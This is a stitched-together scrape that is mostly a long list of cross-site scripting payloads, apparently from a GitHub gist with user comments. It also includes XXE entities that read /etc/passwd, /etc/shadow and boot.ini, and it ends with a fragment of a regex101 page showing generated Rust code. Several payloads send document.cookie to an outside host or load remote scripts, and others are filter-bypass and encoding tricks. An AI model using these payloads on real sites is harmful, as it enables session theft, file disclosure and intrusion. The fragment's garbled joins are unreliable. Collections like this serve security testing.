exp/*<A STYLE='no\\xss:noxss(\"*//*\");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
<style TYPE=\"text/javascript\">document.vulnerable=true;</style>
<style>.XSS{background-image:url(\"javascript:document.vulnerable=true\");}</STYLE><A CLASS=XSS></a>
<style type=\"text/css\">BODY{background:url(\"javascript:document.vulnerable=true\")}</style>
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
<base HREF=\"javascript:document.vulnerable=true;//\">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
<XML ID=I><X><C><![<IMG SRC=\"javas]]<![cript:document.vulnerable=true;\">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:document.vulnerable=true\"></B></I></XML><SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></span>
<html><BODY><?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"><?import namespace=\"t\" implementation=\"#default#time2\"><t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>\"></BODY></html>
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
<meta HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>document.vulnerable=true</SCRIPT>\">
<head><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
<a href=\"javascript#document.vulnerable=true;\">
<div onmouseover=\"document.vulnerable=true;\">
<img src=\"javascript:document.vulnerable=true;\">
<img dynsrc=\"javascript:document.vulnerable=true;\">
<input type=\"image\" dynsrc=\"javascript:document.vulnerable=true;\">
<bgsound src=\"javascript:document.vulnerable=true;\">
&<script>document.vulnerable=true;</script>
&{document.vulnerable=true;};
<img src=&{document.vulnerable=true;};>
<link rel=\"stylesheet\" href=\"javascript:document.vulnerable=true;\">
<iframe src=\"vbscript:document.vulnerable=true;\">
<img src=\"mocha:document.vulnerable=true;\">
<img src=\"livescript:document.vulnerable=true;\">
<a href=\"about:<script>document.vulnerable=true;</script>\">
<meta http-equiv=\"refresh\" content=\"0;url=javascript:document.vulnerable=true;\">
<body onload=\"document.vulnerable=true;\">
<div style=\"background-image: url(javascript:document.vulnerable=true;);\">
<div style=\"behaviour: url([link to code]);\">
<div style=\"binding: url([link to code]);\">
<div style=\"width: expression(document.vulnerable=true;);\">
<style type=\"text/javascript\">document.vulnerable=true;</style>
<object classid=\"clsid:...\" codebase=\"javascript:document.vulnerable=true;\">
<style><!--</style><script>document.vulnerable=true;//--></script>
<<script>document.vulnerable=true;</script>
<![<!--]]<script>document.vulnerable=true;//--></script>
<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
<img src=\"blah\"onmouseover=\"document.vulnerable=true;\">
<img src=\"blah>\" onmouseover=\"document.vulnerable=true;\">
<xml src=\"javascript:document.vulnerable=true;\">
<xml id=\"X\"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
<div datafld=\"b\" dataformatas=\"html\" datasrc=\"#X\"></div>
[\\xC0][\\xBC]script>document.vulnerable=true;[\\xC0][\\xBC]/script>
<style>@import'http://www.securitycompass.com/xss.css';</style>
<meta HTTP-EQUIV=\"Link\" Content=\"<http://www.securitycompass.com/xss.css>; REL=stylesheet\">
<style>BODY{-moz-binding:url(\"http://www.securitycompass.com/xssmoz.xml#xss\")}</style>
<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://www.securitycompass.com/scriptlet.html\"></object>
<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://www.securitycompass.com/xss.htc\"><xss:xss>XSS</xss:xss></html>
<script SRC=\"http://www.securitycompass.com/xss.jpg\"></script>
<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'\"-->
<script a=\">\" SRC=\"http://www.securitycompass.com/xss.js\"></script>
<script =\">\" SRC=\"http://www.securitycompass.com/xss.js\"></script>
<script a=\">\" '' SRC=\"http://www.securitycompass.com/xss.js\"></script>
<script \"a='>'\" SRC=\"http://www.securitycompass.com/xss.js\"></script>
<script a=`>` SRC=\"http://www.securitycompass.com/xss.js\"></script>
<script a=\">'>\" SRC=\"http://www.securitycompass.com/xss.js\"></script>
<script>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://www.securitycompass.com/xss.js\"></script>
<div style=\"binding: url(http://www.securitycompass.com/xss.js);\"> [Mozilla]
\";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\\]^`=alert(\";XSS\";)>;
<;/script>;<;script>;alert(1)<;/script>;
<;/br style=a:expression(alert())>;
<;scrscriptipt>;alert(1)<;/scrscriptipt>;
<;br size=\\\";&;{alert(&#039;XSS&#039;)}\\\";>;
perl -e &#039;print \\\";<;IMG SRC=java\\0script:alert(\\\";XSS\\\";)>;\\\";;&#039; >; out
perl -e &#039;print \\\";<;SCR\\0IPT>;alert(\\\";XSS\\\";)<;/SCR\\0IPT>;\\\";;&#039; >; out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location=\"http://www.procheckup.com/?sid=\"%2bdocument.cookie)>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<~/XSS STYLE=xss:expression(alert('XSS'))>
\"><script>alert('XSS')</script>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
</XSS STYLE=xss:expression(alert('XSS'))>
>\"><script>alert(\"XSS\")</script>&
\"><STYLE>@import\"javascript:alert('XSS')\";</STYLE>
>\"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
\">
>\"
'';!--\"<XSS>=&{()}
<IMG SRC=\"javascript:alert('XSS');\">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)>
<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>
<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>    
<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC=\"jav&#x0A;ascript:alert(<WBR>'XSS');\">
<IMG SRC=\"jav&#x0D;ascript:alert(<WBR>'XSS');\">
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[' or 1=1 or ''=']]></foof>
<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file://c:/boot.ini\">]><foo>&xee;</foo>
<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xee;</foo>
<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:///etc/shadow\">]><foo>&xee;</foo>
<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:///dev/random\">]><foo>&xee;</foo>
<script>alert('XSS')</script>
%3cscript%3ealert('XSS')%3c/script%3e
%22%3e%3cscript%3ealert('XSS')%3c/script%3e
<IMG SRC=\"javascript:alert('XSS');\">
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert('XSS')>       
<img src=xss onerror=alert(1)>
<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<BODY BACKGROUND=\"javascript:alert('XSS')\">
<BODY ONLOAD=alert('XSS')>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
<IMG SRC=\"javascript:alert('XSS')\"
<iframe src=http://ha.ckers.org/scriptlet.html <
<<SCRIPT>alert(\"XSS\");//<</SCRIPT>
%253cscript%253ealert(1)%253c/script%253e
\"><s\"%2b\"cript>alert(document.cookie)</script>
foo<script>alert(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt>
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<marquee onstart='javascript:alert('1');'>=(◕_◕)=
<iframe src=\"http://ha.ckers.org/scriptlet.html\"></iframe>
<;/script>;<;script>;alert(1)<;/script>;
@ismilsen
ismilsen commented on 13 Jan 2018
<marquee onstart='javascript:alert('1');'>=(◕_◕)=

@ismilsen
ismilsen commented on 13 Jan 2018
No description provided.

@ismilsen
ismilsen commented on 13 Jan 2018
<;/script>;<;script>;alert(1)<;/script>;

@ismilsen
ismilsen commented on 13 Jan 2018
s

<iframe src=\"http://ha.ckers.org/scriptlet.html\"></iframe>
@bloodyk1ng
bloodyk1ng commented on 13 Apr 2018 • 
123

@bloodyk1ng
bloodyk1ng commented on 13 Apr 2018 • 
No description provided.

@butch310
butch310 commented on 22 May 2018
=(◕_◕)=

@anton7r
anton7r commented on 28 Jun 2019
Cool, alot of vectors

@JaxonWright
JaxonWright commented on 26 Nov 2019
=(◕_◕)=

 to join this conversation on GitHub. Already have an account? Sign in to comment
© 2020 GitHub, Inc.
Terms
Privacy
Security
Status
Help
Contact GitHub
Pricing
API
Training
Blog
About



<script>Hello world!</script>
<boldb>Goodbye world!</bold>
<b>This turkey won't fly.</b>
<a></a>
<b onmouseover=alert(‘XSS testing!‘)></b>
<body onload=alert('test1')>
<img src=\"http://url.to.file.which/not.exist\" onerror=alert(document.cookie);>
<arigato></arigato>
<.ujjghgh></.uuujjjk>


>>> Your new user agent string here <<<

&lt;/SCRIPT&gt;sdadadadsada
<object classid=\"clsid:...\" codebase=\"javascript:document.vulnerable=true;\">

<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
<a onmouseover=”alert(document.cookie)”>xxs link</a>
<SCRIPT SRC=http://xss.rocks/xss.js?< B >

&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;

<@httph>
< v reanghghtert50150015881215800167690000>
";
  
  // result will be an iterator over tuples containing the start and end indices for each match in the string
  let result = regex.captures_iter(string);
  
  for mat in result {
    println!("{:?}", mat);
  }
}
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for Rust, please visit: https://docs.rs/regex/latest/regex/
Regular Expressions 101

Save & Share

Flavor

Function

Tools

Explanation

Match Information

Quick Reference

Regular Expression
No Match

Test String

Code Generator

Language

Generated Code

Save & Share

Flavor

Function

Tools

Explanation

Match Information

Quick Reference

Regular ExpressionNo Match

Test String

Regular Expression
No Match
